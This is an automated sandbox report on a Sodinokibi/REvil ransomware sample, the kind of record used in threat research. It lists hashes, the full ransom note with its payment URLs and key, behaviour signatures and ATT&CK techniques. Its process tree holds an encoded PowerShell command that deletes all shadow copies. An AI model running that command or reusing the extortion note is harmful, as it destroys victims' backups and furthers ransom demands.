Analysis

  • max time kernel
    131s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    11-05-2022 15:55

General

  • Target

    a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3.exe

  • Size

    166KB

  • MD5

    a055246b0e804eb3a1dda52937f556ef

  • SHA1

    6807425e1252f1154664fc8072dde03558ed35fe

  • SHA256

    a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3

  • SHA512

    18b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95

Malware Config

Extracted

Path

C:\mhrb15hk8l-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension mhrb15hk8l. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2093DB1EC012BD4A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2093DB1EC012BD4A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: T/nSQBSMNoScAgZEJ+ToQlnr0qfXPUOvTAuK/7UWdQ87CZnetuJOfOFBOddIii97 hC0VnxK8QqHkmjK95T+jqkTdXYMU12DeVmruYDNFWwGFmHm1p8AOGYiotnm1WWFe 5gKzKyozg0j+6QHTQOzjjM8jGBS8mCt6ZY/G+e8mY8Ivpb8w8JiQYyctkgOf4SFQ Cjt2/rBbWMWaJonmB7R4YDgxPB1Q5fKS5Vvw+D5uCayHVLUqVAgSIyXcgDO2+eui 4XEYKffNJJw1fWts92INv063NB9uRSME7V6MLc0a6RNwggwC1qxz8GOGFZUbQ11w 8ZzhCwrNgjtXT3NsamFIanLAqFVr0W1etXTnuJHAtxd9iNK2VzmwEBMvq67FKppa enyv3/EK0v3vZ42P6St+liYzDadcXsOCHG8siXuiQFEza2CL+GzvCJgDhjPOtKLB PXT+nN76byz7c5ZLqayRR5MVbAGdO9pqBE2WpBPWQbqpZ52dSPp7kghmnzA3hvdz sULvuRL4qLBICqQYx0RPBcwbtYYj4JrRn7ZJq3r7ap3aJ0On6bZsgbgGQZy1bWgf udQ/+d+sMDMkcFczSHJXcMJC05mNifAkG8J9beM4Yw59OZ3z3FW2n3CrM+ER6Sij kaMH0/pl0Qgc9+ysCu0PsD0Oi5lCX1h3N0Ne5UQKHIuQQGvBUZjNKegp6ekevXx0 6vgKjjIshiNhEwSM7yZUfWArb+J3kIGJ+ErOENeajBVrGlUWJGmTkHXaPizvWQde sbRgPHZt1AhBj7ptB7l/lR8uhyg6QGBd7RuV+rK0mGS69a0xCnHIgpzGtqmdb4nU 71JleAQXL2LA/nP+ZH0EYyWmQWZ4IjkKEx2x2Pi5x1Sgdtz6peDwD56Eti2N3vMZ Wy3d0amwIjJB39RigZWQGR3HZJ36SFoRTLZTJBlxAwtPCAGREQVrOfYrMwxHKCXN C4jXopU/VAAvVhVu0d3mXlzMMFk+30NeaKI3WfMj5Jb9yrCdl8J43G6cPOLls+cP kzElM35O+F8Q7InI3OBAnd/txPcy6lt3hwpbzRQBbOEhtsWOV0GE7SWV5Q4yIBfm Sg5X4bN22SUVMjuQzsxw0SK+FBQFY6zgddCbkfjNpfP3/aeVHCVLHE74TD+7lIwE JVBy3Y7DuP83OYTZmPgUCnjsXr47CknfsYVBVEl89nottbmf4nEy6SNy+farAOmM uanXQfRC8TuIZaGwJw9UsOBi1CM4fu4UYGEnngN+gUa8xjeqw/y+loIjieHHDDVx 3SMtdnqO4i9FejAJuLaGTn4WekJtfA3UYp9A7/xEj78hlH10VlE= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2093DB1EC012BD4A

http://decryptor.cc/2093DB1EC012BD4A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3.exe
    "C:\Users\Admin\AppData\Local\Temp\a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4288
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4232
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4888

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4288-130-0x0000000000000000-mapping.dmp
    • memory/4288-131-0x000001B9F24A0000-0x000001B9F24C2000-memory.dmp
      Filesize

      136KB

    • memory/4288-132-0x00007FFD62B30000-0x00007FFD635F1000-memory.dmp
      Filesize

      10.8MB